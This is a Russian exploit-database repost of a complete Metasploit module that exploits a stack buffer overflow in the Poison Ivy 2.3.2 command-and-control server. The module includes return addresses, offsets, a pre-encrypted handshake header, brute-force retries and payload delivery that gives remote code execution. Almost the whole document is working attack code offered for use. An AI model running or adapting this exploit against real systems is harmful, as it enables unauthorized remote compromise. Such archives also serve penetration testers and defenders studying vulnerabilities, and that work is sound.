- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19613
- Проверка EDB
-
- Пройдено
- Автор
- METASPLOIT
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2012-07-06
Poison Ivy 2.3.2 (C2 Server) - Remote Buffer Overflow (Metasploit)
Код:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
The exploit does not need to know the password chosen for the bot/server
communication. If the C&C is configured with the default 'admin' password,
the exploit should work fine. In case of the C&C configured with another
password the exploit can fail. The 'check' command can be used to determine
if the C&C target is using the default 'admin' password.
Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
responsible of handling the connection. Because of this the module provides the
RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
will be used. If the bruteforce target is selected, a random header will be sent in
case the default for the password 'admin' doesn't work. Bruteforce will stop after
5 tries or a session obtained.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrzej Dereszowski', # Vulnerability Discovery
'Gal Badishi', # Exploit and Metasploit module
'juan vazquez' # Testing and little of Metasploit-fu
],
'References' =>
[
[ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
[ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
],
'DisclosureDate' => "Jun 24 2012",
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'StackAdjustment' => -4000,
'Space' => 10000,
'BadChars' => "",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
}
],
[ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp
'Bruteforce' =>
{
'Start' => { 'Try' => 1 },
'Stop' => { 'Try' => 6 },
'Step' => 1,
'Delay' => 2
}
}
],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(3460),
OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
], self.class)
register_advanced_options(
[
OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
], self.class)
end
def check
sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
lensig = [0x000015D0].pack("V")
connect
sock.put("\x00" * 256)
response = sock.read(256)
datalen = sock.read(4)
disconnect
if datalen == lensig
if response[0, 16] == sig
print_status("Password appears to be \"admin\"")
else
print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
end
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def single_exploit
if datastore['RANDHEADER'] == true
# Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
header = rand_text(0x20)
else
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
# We have a very good chance of succeeding even if the password was changed
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
end
do_exploit(header)
end
def brute_exploit(brute_target)
if brute_target['Try'] == 1
print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password")
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
# We have a very good chance of succeeding even if the password was changed
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
else
print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header")
# Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
header = rand_text(0x20)
end
do_exploit(header)
end
def do_exploit(header)
# Handshake
connect
print_status("Performing handshake...")
sock.put("\x00" * 256)
sock.get
# Don't change the nulls, or it might not work
xploit = ''
xploit << header
xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
xploit << payload.encoded
xploit << "\x00" * (target['Offset'] - xploit.length)
xploit << [target.ret].pack("V") # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
# The disconnection triggers the exploit
print_status("Sending exploit...")
sock.put(xploit)
select(nil,nil,nil,5)
disconnect
end
end
=begin
* ROP version of exploit(): Has been discarded at the moment because of two reasons:
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
=end
- Источник
- www.exploit-db.com